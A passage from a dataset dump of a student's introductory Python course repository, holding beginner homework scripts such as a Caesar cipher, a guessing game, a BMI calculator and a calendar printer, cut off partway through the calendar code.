life there is no final pre-established target!*\n5. ***Survival*** - Take the highest scoring string, and go to step **2**.\n\n\n\n## Conclusions\n\n* It's interesting to *vary the number of offsping per generation* and the *mutation probability* and see how generations evolve\n * For a higher N the generations evolve much more quickly towards the target\n * For a higher P evolution becomes random\n\n\n"
}
] | 2 |
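A small driver to reproduce the Conclusions above (how N and P affect convergence) might look like the sketch below. Note that `weasel.py` uses Python 2 syntax (`print` statements, `itertools.imap`), so this assumes a Python 2 interpreter; the parameter grids are arbitrary examples:

```python
# Sketch (Python 2): sweep population size and mutation rate and watch
# how many generations evolve() needs. Grid values are arbitrary examples.
from weasel import evolve

for numOffspring in (10, 100, 1000):
    for mutationProb in (1, 5, 20):
        print "--- N=%d offspring, P=%d%% mutation ---" % (numOffspring, mutationProb)
        evolve(numOffspring, mutationProb)
```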
mtouhidchowdhury/CS1114-Intro-to-python
|
https://github.com/mtouhidchowdhury/CS1114-Intro-to-python
|
2b622db0116842d13377d1eae3c744f5a7595275
|
31f311a1991f2d6affcbe13e6b8cd0c154bc59b6
|
cf2fd8ffb4777e44aa8c0b0522385ed86f12d799
|
refs/heads/master
| 2020-07-02T01:09:31.543145 | 2019-08-09T02:50:28 | 2019-08-09T02:50:28 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.512110710144043,
"alphanum_fraction": 0.5405908823013306,
"avg_line_length": 23.14765167236328,
"blob_id": "d80b6cb2b647a3a3976691c7b01d9bfea8e944a6",
"content_id": "792edb874b0f096211346a3a9d4c57da1e5b10a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3757,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 149,
"path": "/Homework 10/hw10.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nCS-UY 1114\r\nProfessor Frankl\r\nM Touhid Chowdhury\r\nmtc405 N14108583\r\nhw 10\r\nfunction that randomly creates a permutation, function that adds the\r\nvalue of two lists if length is equal, function that gives all prefixes,\r\nfunction that takes menu and then takes order of 3 people.\r\n'''\r\n\r\nimport random\r\n\r\ndef create_permutation(lst):\r\n length = len(lst)\r\n lim = len(lst)-1\r\n \r\n indexes = []\r\n while len(indexes) < length:\r\n randomNum = random.randint(0,lim)\r\n if randomNum in indexes:\r\n indexes = indexes\r\n else:\r\n indexes.append(randomNum)\r\n for number in indexes:\r\n lastNum = lst.pop(number)\r\n lst.append(lastNum)\r\n return lst\r\n\r\ndef main_q1():\r\n print(\"Q1\")\r\n print(\"Sample execution using [1,2,3,4,5,6,7]\")\r\n lst = create_permutation([1,2,3,4,5,6,7])\r\n print(lst)\r\nmain_q1()\r\n\r\n\r\n\r\ndef add_list(lst1,lst2):\r\n length = len(lst1)\r\n newList = []\r\n for number in range (0,length):\r\n newList.append(lst1[number]+lst2[number])\r\n return newList\r\n\r\ndef main_q2():\r\n print(\"Q2\")\r\n lst1 =[]\r\n lst2 = []\r\n userInput = 0\r\n userInput1= 0\r\n while userInput != 'done':\r\n userInput = input(\"Enter one number per line for first lst and 'done' when finished: \")\r\n if userInput == 'done':\r\n lst1= lst1\r\n else:\r\n lst1.append(int(userInput))\r\n while userInput1 != 'done':\r\n userInput1 = input(\"Enter one number per line for second lst and 'done' when finished: \")\r\n if userInput1 == 'done':\r\n lst2= lst2\r\n else:\r\n lst2.append(int(userInput1))\r\n if len(lst1) == len(lst2):\r\n newList = add_list(lst1,lst2)\r\n for number in newList:\r\n print(number)\r\n else:\r\n print(\" LISTS ARE NOT EQUAL LENGTH!\")\r\n\r\nmain_q2()\r\n\r\n\r\ndef create_prefix_lists(lst):\r\n copyList = []\r\n ranges = 0 \r\n length = len(lst)\r\n for number in range(0, len(lst)+1):\r\n copyList.append(lst)\r\n for number in range(0, len(lst)+1):\r\n if number == 0:\r\n copyList[number]= []\r\n else:\r\n copyList[number] = copyList[number][0:ranges]\r\n ranges +=1\r\n \r\n return copyList\r\n\r\n\r\ndef main_q3():\r\n print(\"Q3\")\r\n print(\"Sample execution using the list [1,2,3,4]\")\r\n newList = create_prefix_lists([1,2,3,4])\r\n print(newList)\r\n \r\nmain_q3()\r\n\r\n\r\n\r\ndef read_menu():\r\n user = int(input(\"How many items in the menu?: \"))\r\n n = 0\r\n lst = []\r\n while user > n:\r\n item = input(\"Enter item in the form 'name:price': \")\r\n lst.append(tuple(item.split(':')))\r\n n+= 1\r\n return lst\r\n \r\ndef read_order():\r\n userInput = ''\r\n newList = []\r\n while userInput != 'done':\r\n userInput = input(\"what do you want to order? Enter 'done' when finished: \")\r\n if userInput == 'done':\r\n userInput = userInput\r\n else:\r\n newList.append(userInput)\r\n return newList\r\n\r\n\r\ndef compute_price(menu_list,order_list):\r\n total = 0\r\n index = 0 \r\n for element in order_list:\r\n for item in menu_list:\r\n if element in item:\r\n total += float(item[1])\r\n index +=1 \r\n return total\r\n\r\ndef main_q4():\r\n print(\"Q4\")\r\n menu = read_menu()\r\n customers = 3\r\n whichCustomer = 1\r\n while customers != 0:\r\n print(\"Hello, you are customer #\",whichCustomer,\".\")\r\n orders = read_order()\r\n price = compute_price(menu,orders)\r\n tax = price * 0.085\r\n tip = price * 0.15\r\n price = price + tip + tax \r\n print(\"Your total is \", round(price,2))\r\n price = 0\r\n customers -= 1\r\n whichCustomer += 1\r\n \r\nmain_q4()\r\n \r\n\r\n\r\n"
},
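An aside on `create_permutation` in the hw10 entry above: the standard library already provides a uniform in-place shuffle, so an equivalent (and uniformly distributed) version is essentially one line. A sketch, not part of the original assignment:

```python
import random

def create_permutation(lst):
    # random.shuffle is an in-place Fisher-Yates shuffle, uniform over
    # all permutations (unlike the index-sampling approach above)
    random.shuffle(lst)
    return lst

print(create_permutation([1, 2, 3, 4, 5, 6, 7]))
```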
{
"alpha_fraction": 0.6112083792686462,
"alphanum_fraction": 0.6199649572372437,
"avg_line_length": 33.6875,
"blob_id": "f9828d5c1a6a2ddac6460616968346308b15d93b",
"content_id": "778aa8c5dee4ea2f4b81d4396e7038b69fac9aa9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 16,
"path": "/Homework 4/hw4q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting word from user \r\nuserWord = input(\"Please enter a word: \")\r\n\r\n#setting vowel and consonant count to 0 \r\nvowels = 0\r\nconsonants = 0\r\n\r\n#looping through the word and checking if it has vowels or consonant \r\nfor letter in userWord:\r\n if letter == 'a' or letter == 'e' or letter == 'i' or letter == 'o' or letter == 'u' or letter == 'A' or letter == 'E' or letter == 'I' or letter == 'O' or letter == 'U' :\r\n vowels += 1\r\n else:\r\n consonants += 1\r\n\r\n#printing the outcome \r\nprint(userWord, \"has\", vowels,\"vowels and\", consonants, \"consonants.\")\r\n"
},
{
"alpha_fraction": 0.596393883228302,
"alphanum_fraction": 0.6088765859603882,
"avg_line_length": 31.85714340209961,
"blob_id": "9855e06f69b6ada214686a9e1834044ab0bb9efe",
"content_id": "49334c0464ab73ae0ae54208d0a57da50c53268d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 721,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 21,
"path": "/Homework 7/hw7q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n\r\n#getting string and number to shift \r\nstring = input(\"Please enter a text\")\r\nshift = int(input(\"please enter a shift:\"))\r\n#empty string to put the ciphered message in\r\ncipher =\"\"\r\n#loop through string \r\nfor currentLetter in string:\r\n if currentLetter.isupper():\r\n curciph = ord(currentLetter)+shift\r\n if curciph >= 91:\r\n curciph = curciph - 26\r\n cipher = cipher + chr(curciph)\r\n elif currentLetter.islower():\r\n curciph = ord(currentLetter)+ shift\r\n if curciph >= 123:\r\n curciph = curciph -26\r\n cipher = cipher + chr(curciph)\r\n else:\r\n cipher = cipher + currentLetter\r\n#print outcome \r\nprint(\"Encrypted string is:\", cipher) \r\n"
},
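To complement the Caesar encoder above: decryption is just encryption with the shift applied in reverse. A sketch with an illustrative function name (`caesar_decrypt` is not part of the original file):

```python
def caesar_decrypt(cipher, shift):
    # Shift each letter back by 'shift', wrapping within its case,
    # and pass non-letters through unchanged -- mirroring the encoder.
    plain = ""
    for ch in cipher:
        if ch.isupper():
            plain += chr((ord(ch) - ord('A') - shift) % 26 + ord('A'))
        elif ch.islower():
            plain += chr((ord(ch) - ord('a') - shift) % 26 + ord('a'))
        else:
            plain += ch
    return plain

print(caesar_decrypt("Khoor", 3))  # Hello
```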
{
"alpha_fraction": 0.6438923478126526,
"alphanum_fraction": 0.6604554653167725,
"avg_line_length": 26.294116973876953,
"blob_id": "3f24788fc4ecb7013af55567db9fb2ba6a05c672",
"content_id": "4ec3fe839dc969c1bda281581b708356c2260c7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 483,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/Homework 5/hw5q5b.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#setting total to 1 \r\ntotal = 1\r\n#setting userNumber to 1 \r\nuserNumber = 1\r\n#counting number of digits \r\nnumberOfDigits = 0\r\nwhile userNumber != \"Done\":\r\n userNumber = input(\"Please enter a positive integer or 'Done': \")\r\n if userNumber == \"Done\":\r\n total = total \r\n else:\r\n total = int(userNumber) * total\r\n numberOfDigits+= 1\r\n#calculating geometric mean \r\ngeometricMean = total**(1/numberOfDigits)\r\n#printing output\r\nprint(round(geometricMean,3))\r\n"
},
{
"alpha_fraction": 0.5380434989929199,
"alphanum_fraction": 0.6086956262588501,
"avg_line_length": 41.5,
"blob_id": "5b71f7dfe1500cd85e7275edf8831da679e7367f",
"content_id": "4b314944612889e1a0a69be011448879006d119b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 4,
"path": "/Homework 7/hw7q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#printing the table using exponents 1,2,3,4,5 and base 1-11 exclusive \r\nfor exponent in range (1,6):\r\n for base in range(1,11):\r\n print(base**exponent, end= \"\\t\")\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6848958134651184,
"avg_line_length": 29.25,
"blob_id": "f464fa20009a0619fca425c08b0a69a3f05b9809",
"content_id": "71ae81093fa6a4aba34fd6c005a47042bc81d80c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 12,
"path": "/Homework 5/hw5q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#getting user input \r\nuserInput = int(input(\"Please enter a positive integer: \"))\r\n#setting counter for total to 0 \r\ntotal = 0\r\n#starting odd number from 1\r\noddNumbers = 1\r\n#while total is less than the userInput, print odd number and add 2\r\n#add to total so loop doesnt run infinitely \r\nwhile total < userInput:\r\n print (oddNumbers)\r\n oddNumbers += 2\r\n total += 1 \r\n \r\n"
},
{
"alpha_fraction": 0.6131805181503296,
"alphanum_fraction": 0.6284622550010681,
"avg_line_length": 26.19444465637207,
"blob_id": "999394cad04588d0607c98a3089660ff95ff1911",
"content_id": "ea2743312da5eb14072d94b8c9c29ea242e0deda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 36,
"path": "/Homework 8/hw8q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n\r\n'''\r\nM Touhid Chowdhury\r\nmtc405\r\n \r\ndrawTriangle prints a Triangle given number of lines, the amount of shift , and the character to use\r\ndrawTree prints a tree given number of Triangles and the character\r\nmain() interacts with the user \r\n'''\r\n\r\ndef drawTriangle(integer, shift, character):\r\n\r\n number_of_char = 1\r\n number_of_spaces = integer + shift - 1\r\n for i in range(1, integer+1):\r\n line = ' '*number_of_spaces + character*number_of_char\r\n print(line)\r\n number_of_char = number_of_char+2\r\n number_of_spaces = number_of_spaces-1\r\n\r\ndef drawTree(numberOfTriangles,character):\r\n start = 1\r\n shift= numberOfTriangles -1\r\n for i in range(2,numberOfTriangles+2):\r\n drawTriangle(i, shift,character)\r\n shift-=1\r\n start+= 1\r\n numberOfTriangles+=1\r\n\r\n\r\ndef main():\r\n userCharacter = input(\"enter character to build with: \")\r\n userNumberTriangle= int(input(\"number of triangles: \"))\r\n drawTree(userNumberTriangle,userCharacter)\r\n \r\n \r\nmain()\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.47837838530540466,
"alphanum_fraction": 0.5027027130126953,
"avg_line_length": 20.9375,
"blob_id": "0925c254b246b91ae5cd4156e06541972c38863b",
"content_id": "ec962266ec96ffb49a6584fc6bd45bec0fe3bb29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 370,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 16,
"path": "/Homework 5/hw5q7.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#getting user bound\r\nuserInput = int(input(\"Please enter a positive integer: \"))\r\n#begin with 2 \r\nnumber = 2\r\n\r\nwhile number < userInput or (number == userInput):\r\n even = 0\r\n odd = 0\r\n for x in str(number):\r\n if int(x) % 2 == 0:\r\n even += 1\r\n else:\r\n odd += 1\r\n if even > odd:\r\n print(number)\r\n number += 2 \r\n"
},
{
"alpha_fraction": 0.517699122428894,
"alphanum_fraction": 0.5648967623710632,
"avg_line_length": 17.941177368164062,
"blob_id": "30930230615e8fe2e6a96b5120339fbcad075bc0",
"content_id": "63be36c3abba7f064b630e43db770f8c97c9b806",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 678,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 34,
"path": "/Homework 5/hw5q4.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting user integer\r\ninteger = int(input(\"Please enter a positive integer: \"))\r\n#assign respective roman numeral to its value\r\nI = 1\r\nV = 5\r\nX = 10\r\nL = 50\r\nC = 100\r\nD = 500\r\nM = 1000\r\n\r\nroman =\"\"\r\nwhile integer >= M:\r\n integer = integer - 1000\r\n roman+= \"M\"\r\nwhile integer >= D:\r\n integer = integer - 500\r\n roman+= \"D\"\r\nwhile integer >= C:\r\n integer = integer - 100\r\n roman+= \"C\"\r\nwhile integer >= L:\r\n integer = integer - 50\r\n roman+= \"L\"\r\nwhile integer >= X:\r\n integer = integer - 10\r\n roman+= \"X\"\r\nwhile integer >= V:\r\n integer = integer - 5\r\n roman+= \"V\"\r\nwhile integer >= I:\r\n integer = integer - 1\r\n roman+= \"I\"\r\nprint(roman)\r\n"
},
{
"alpha_fraction": 0.6266447305679321,
"alphanum_fraction": 0.7351973652839661,
"avg_line_length": 16.42424201965332,
"blob_id": "de1dd7d9d282e84eccfb8b2b12f776c240f95b8e",
"content_id": "257714eff43d69571bdf3247b51a5f038d840100",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 608,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 33,
"path": "/Homework 2/hw2q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#drawing a titled square with thre 20 degree turns \r\n\r\nimport turtle\r\n\r\n#first square\r\nturtle.left(20)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\n#secondsquare\r\nturtle.left(20)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\n#third square \r\nturtle.left(20)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\nturtle.left(90)\r\nturtle.forward(200)\r\n"
},
{
"alpha_fraction": 0.6292397379875183,
"alphanum_fraction": 0.6456140279769897,
"avg_line_length": 41.43589782714844,
"blob_id": "e2836dded795cfd45e297f05d467e04c35901858",
"content_id": "5010573203cd60bf14a93815c353332e18845494",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1710,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 39,
"path": "/Homework 7/hw7q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "\r\n#importing module\r\nimport random\r\n#generating a random number and assign to a variable\r\nrandomNumber = random.randint(1,100)\r\n#set number of guesses to 0 and how many remain to 5 \r\nnumberGuesses= 0\r\nguessRemain = 5\r\n#first guess\r\nuserGuess = int(input(\"please enter a number between 1 and 100: \"))\r\n# minus from guess remain and adding to number of guesses \r\nguessRemain -= 1\r\nnumberGuesses += 1\r\n# making bounds for the ranges \r\nlowerBound = 0\r\nupperBound = 101\r\n#if first guess correct then goes to if otherwise goes to else \r\nif userGuess == randomNumber:\r\n print(\"Your Correct!\")\r\n#loop till guesses remaining is 0 and user's guess is the number \r\nelse:\r\n while guessRemain != 0 and userGuess != randomNumber :\r\n if userGuess < randomNumber:\r\n lowerBound = userGuess\r\n userGuessLine = \"Guess again between \"+ str(lowerBound + 1) + \" and \" + str(upperBound - 1) + \". You have \" + str(guessRemain) + \" guesses remaining: \"\r\n userGuess = int(input (userGuessLine))\r\n guessRemain -= 1\r\n numberGuesses += 1\r\n elif userGuess > randomNumber:\r\n upperBound = userGuess\r\n userGuessLine = \"Guess again between \" + str(lowerBound + 1) + \" and \"+ str(upperBound - 1) + \". You have \" + str(guessRemain) + \" guesses remaining: \"\r\n userGuess = int(input (userGuessLine))\r\n guessRemain -= 1\r\n numberGuesses += 1\r\n#output if won tells how many guesses took if lost then tells user that he/she lost \r\nif userGuess == randomNumber:\r\n line= \"Congrats! you guessed the answer in \" + str(numberGuesses) + \" guesses!\"\r\n print(line)\r\nelse:\r\n print (\"You ran out of guesses\")\r\n \r\n \r\n\r\n"
},
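Side note on the guessing game above: the bound-narrowing hints suggest a midpoint (binary-search) strategy, which needs ceil(log2(100)) = 7 guesses to guarantee a win over 1-100, so 5 guesses can never be a sure thing. A one-line check:

```python
import math

# Worst-case guesses for binary search over 1..100
print(math.ceil(math.log2(100)))  # 7
```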
{
"alpha_fraction": 0.45610859990119934,
"alphanum_fraction": 0.4714932143688202,
"avg_line_length": 21.17021369934082,
"blob_id": "48a254cef1a5263725cfce9d8af61fe2b56efdc8",
"content_id": "76d1d5e1db67113a316123ce05aa6ea2d38211fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 47,
"path": "/Homework 12/hw12.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\n\r\nM. Touhid Chowdhury\r\nmtc405\r\nN14108580\r\nProfessor Frankl\r\nHW 12\r\nNote: used the windows file\r\nhad extra lines so removed that using if statement \r\n\r\n'''\r\n\r\n\r\ndef function(file,user):\r\n file = open(file, 'r')\r\n empty = []\r\n header = file.readline()\r\n string = \"\"\r\n for line in file:\r\n line = line.strip()\r\n lst = line.split(',,')\r\n if '' not in lst:\r\n Id = lst[0]\r\n stop = lst[1]\r\n train_line = Id[0]\r\n if train_line == str(user):\r\n if stop not in empty:\r\n empty.append(stop)\r\n if empty == []:\r\n print(\"This train line does not exist\")\r\n else:\r\n print(user, \"line:\", end = ' ')\r\n for stop in empty:\r\n string += stop+ \", \"\r\n print(string[:-2])\r\n print(\"\\n\")\r\n \r\n\r\ndef main():\r\n keepGoing = True\r\n while keepGoing:\r\n user = input(\"Enter a train line or 'done' to stop: \").upper()\r\n if user.upper() != 'DONE':\r\n function('train stop data-Windows.csv', user)\r\n else:\r\n keepGoing = False\r\nmain()\r\n\r\n \r\n"
},
{
"alpha_fraction": 0.6984265446662903,
"alphanum_fraction": 0.7010489702224731,
"avg_line_length": 33.75,
"blob_id": "eae1757a2d8f3cd01bb4df79853631a584ea642d",
"content_id": "2c66841602d4033bb867fa54423a6ad05a486dc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1144,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 32,
"path": "/Homework 4/hw4q3.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#getting users desired expression\r\nuserExpression = input(\"Please input a mathematical expression: \")\r\n\r\n#position of the blank\r\npositionOfBlank = userExpression.find(' ')\r\n\r\n#getting first number by indexing to the blank \r\nfirstNumber = userExpression[0:positionOfBlank]\r\n\r\n#taking the remainder of the statement \r\nremaining = userExpression[positionOfBlank+1:]\r\n\r\n#getting the operator by taking the next first index\r\noperand = remaining[0]\r\n\r\n#getting second number by taking the remainder after the position\r\nsecondNumber = remaining[positionOfBlank:]\r\n\r\n#checking what the operator is and doing the calculation\r\n#printing the result \r\nif operand == '+':\r\n total = int(firstNumber) + int(secondNumber)\r\n print(firstNumber,\" + \",secondNumber,\" = \", total)\r\nif operand == '-':\r\n total = int(firstNumber) - int(secondNumber)\r\n print(firstNumber,\" - \",secondNumber,\" = \", total)\r\nif operand == '/':\r\n total = int(firstNumber) / int(secondNumber)\r\n print(firstNumber,\" / \",secondNumber,\" = \", total)\r\nif operand == '*':\r\n total = int(firstNumber) * int(secondNumber)\r\n print(firstNumber,\" * \",secondNumber,\" = \", total)\r\n"
},
{
"alpha_fraction": 0.6527331471443176,
"alphanum_fraction": 0.6816720366477966,
"avg_line_length": 34.588233947753906,
"blob_id": "1736f9fdee85d6ddcdd1579875681da5aca37e10",
"content_id": "0f95a4ece403821b3845d4f892fb8c1f909953e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 622,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 17,
"path": "/Homework 3/hw3q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#calculate the BMI of person by taking their weight and height then classifying them\r\n\r\nweight = float(input(\"please enter weight in kilograms:\")) #user weight input\r\nheight = float(input(\"please enter height in meters:\"))# user height input\r\n\r\nBMI = weight / (height**2) #using the BMI formula \r\n\r\nprint (\"BMI is\", round(BMI,7))#printing the results \r\n#classifying the person based on bmi\r\nif BMI < 18.5:\r\n print(\"Your considered underweight.\")\r\nelif 18.5 >= BMI <= 24.9:\r\n print(\"Your considered normal.\")\r\nelif 25>= BMI <= 29.9:\r\n print(\"Your condered overweight.\")\r\nelif BMI >= 30:\r\n print(\"Your Obese!\")\r\n"
},
{
"alpha_fraction": 0.7033898234367371,
"alphanum_fraction": 0.7322033643722534,
"avg_line_length": 26.047618865966797,
"blob_id": "287c5c8385423f46ab072ef0fd0f1ac53466f47d",
"content_id": "3b3110928b3f80affbe43888d10dbdb011603e1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 21,
"path": "/Homework 2/hw2q2.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "#takes 3 digit positive integer and prints the sum\r\n\r\n\r\nuser = int(input(\"please input a three digit positive number\"))\r\n#getting user input\r\n\r\nfirstDigit = user // 100\r\n#first digit attained by dividing by 100 without remainder\r\n\r\nsecondDigit = (user // 10) % 10\r\n#second digit attained by dividing by 10 without remainder, then taking remainder of that\r\n\r\n\r\nthirdDigit = user % 10\r\n# dividing by 10 and taking the remainder only(ones place)\r\n\r\nsumOfDigits = firstDigit + secondDigit + thirdDigit\r\n#sum of the digits\r\n\r\nprint(\" The sum of its digits is\", sumOfDigits)\r\n#printing outcome \r\n"
},
{
"alpha_fraction": 0.5291507244110107,
"alphanum_fraction": 0.5628404021263123,
"avg_line_length": 30.899999618530273,
"blob_id": "d058fc1103bdead558a7c2301f8aa361f8badb8c",
"content_id": "27226f0bc4ab52c671b8dc078a9e6fefa7695c4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4957,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 150,
"path": "/Homework 8/hw8q1.py",
"repo_name": "mtouhidchowdhury/CS1114-Intro-to-python",
"src_encoding": "UTF-8",
"text": "'''\r\nM Touhid Chowdhury\r\nmtc405\r\n\r\nfunction to print monthly calander and return what day the next month would begin\r\nfunction to check leap year\r\nfunction to build a year calendar\r\n\r\n\r\n'''\r\n\r\ndef monthly_calendar(daysInMonth,startingDay):\r\n '''this function takes in parameter for number of days in month and\r\n day of the week that represents when calendar begins and prints that month'''\r\n \r\n print(\"Mo\\tTu\\tWe\\tTh\\tFr\\tSa\\tSu\\t\")\r\n\r\n for number in range(startingDay-1):\r\n print (\"\\t\", end = \"\")\r\n\r\n initial = 1\r\n while initial <= daysInMonth:\r\n print (\" \", initial,end = \"\\t\" )\r\n if (initial + startingDay - 1) % 7 == 0:\r\n print (\"\\n\")\r\n initial += 1\r\n\r\n nextDay = ((daysInMonth-1+startingDay)%7+1)\r\n print('\\n')\r\n print(\"next day of the month would begin\", nextDay)\r\n return nextDay\r\n\r\nnextDay = monthly_calendar(31,4)\r\nprint('\\n')\r\n\r\n#input \r\ndef check_if_leap_year(year):\r\n \r\n leap = False\r\n if year % 4 == 0 and year % 100 != 0:\r\n leap = True\r\n if year % 100 ==0 and year % 400 == 0:\r\n leap = True\r\n return leap\r\nuserYear= int(input(\"Please enter a year to check if its leap year or not\"))\r\nleap = check_if_leap_year(userYear)\r\nprint(leap)\r\n\r\ndef yearly_calendar(year,startingDay):\r\n checking = check_if_leap_year(year)\r\n if checking == True:\r\n print(\"\\t\\t\\tJANUARY\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay= ((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tFEBUARY\", year)\r\n monthly_calendar(29,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+28)%7+1)\r\n print(\"\\t\\t\\tMARCH\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tAPRIL\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tMAY\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tJune\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tJuly\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tAugust\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tSeptember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tOctober\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tNovember\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tDecember\", year)\r\n monthly_calendar(31,startingDay)\r\n elif checking == False:\r\n print(\"\\t\\t\\tJanuary\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay= ((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tFebruary\", year)\r\n monthly_calendar(28,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+27)%7+1)\r\n print(\"\\t\\t\\tMarch\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+30)%7+1)\r\n print(\"\\t\\t\\tApril\", year)\r\n monthly_calendar(30,startingDay)\r\n print('\\n')\r\n startingDay=((startingDay+29)%7+1)\r\n print(\"\\t\\t\\tMay\", year)\r\n monthly_calendar(31,startingDay)\r\n print('\\n')\r\n 
